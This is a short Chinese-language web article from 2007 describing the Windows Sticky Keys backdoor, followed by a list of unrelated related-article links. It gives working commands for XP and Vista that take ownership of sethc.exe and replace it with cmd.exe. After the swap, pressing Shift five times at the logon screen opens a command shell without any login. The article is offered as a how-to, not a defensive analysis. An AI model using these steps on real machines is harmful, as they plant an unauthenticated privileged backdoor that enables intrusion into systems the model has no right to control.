WINDOWS漏洞：粘置鍵

更新時(shí)間：2007年04月23日 00:00:00 作者：

在windows 2000/xp/vista下，按shift鍵5次，可以打開粘置，會(huì)運(yùn)行sethc.exe，而且，在登錄界面里也可以打開。這就讓人聯(lián)想到WINDOWS的屏保，將程序替換成cmd.exe后，就可以打開shell了。

參考McafeeAvertLabs：
http://feeds.feedburner.com/~r/McafeeAvertLabsBlog/~3/101149799/

XP：
將安裝源光盤彈出（或?qū)⒂脖P上的安裝目錄改名)
cd %widnir%\system32\dllcache
ren sethc.exe *.ex~
cd %widnir%\system32
copy /y cmd.exe sethc.exe

VISTA：
takeown /f c:\windows\system32\sethc.exe
cacls c:\windows\system32\sethc.exe /G administrator:F
然后按XP方法替換文件

在登錄界面按5此SHIFT，出來cmd shell，然后……

WINDOWS漏洞：粘置鍵

相關(guān)文章

解析導(dǎo)致局域網(wǎng)網(wǎng)速變慢的五大真兇
解析導(dǎo)致局域網(wǎng)網(wǎng)速變慢的五大真兇...
2007-11-11
刪除XP中“自定義通知”的歷史項(xiàng)目
XP中自定義通知很反感，告訴大家它的刪除方法
2008-04-04
Windows 2003 SP2上QQ死機(jī)的多種解決方案
Windows 2003 SP2上QQ死機(jī)的多種解決方案...
2007-04-04
參考多個(gè)站點(diǎn)集合的Eclipse的快捷鍵大全
學(xué)習(xí)Eclipse的朋友需要知道的快捷鍵
2008-07-07
關(guān)于三種主流WEB架構(gòu)的思考
做WEB好幾年了，各種語言和技術(shù)都稍有涉獵。今天心血來潮，突然想總結(jié)一下。其實(shí)不論什么技術(shù)，什么需求，通常WEB開發(fā)就是通過WEB前端管理一個(gè)或大或小或獨(dú)立或分布式的關(guān)系型數(shù)據(jù)庫，很多東西都是相通的。這里說的WEB架構(gòu)，是指WEB應(yīng)用開發(fā)中每種技術(shù)獨(dú)有的資源組織形式（包括文件，數(shù)據(jù)庫，HTTP請(qǐng)求處理等。注意并非OO的開發(fā)方式才有架構(gòu)一說），也許說開發(fā)方式更容易讓人理解一些。
2008-04-04
文件系統(tǒng)變?yōu)閞aw 無法訪問的解決方法
文件系統(tǒng)變?yōu)閞aw 無法訪問的解決方法，下面整理了比較多的方法，因?yàn)榄h(huán)境特殊，無法測(cè)試望諒解。
2007-08-08
刪除QQ好友遇到連接超時(shí)提示的解決
2008-02-02
IE修改INI的優(yōu)化提速方法附IE 6.INI文件
IE修改INI的優(yōu)化提速方法附IE 6.INI文件...
2007-03-03
快速啟動(dòng)桌面圖標(biāo)丟失的解決方法
恢復(fù)“快速啟動(dòng)欄”里丟失的“顯示桌面”圖標(biāo)的方法
2008-08-08
EXCEL自動(dòng)備份文件的設(shè)置方法
EXCEL自動(dòng)備份文件的設(shè)置方法...
2007-09-09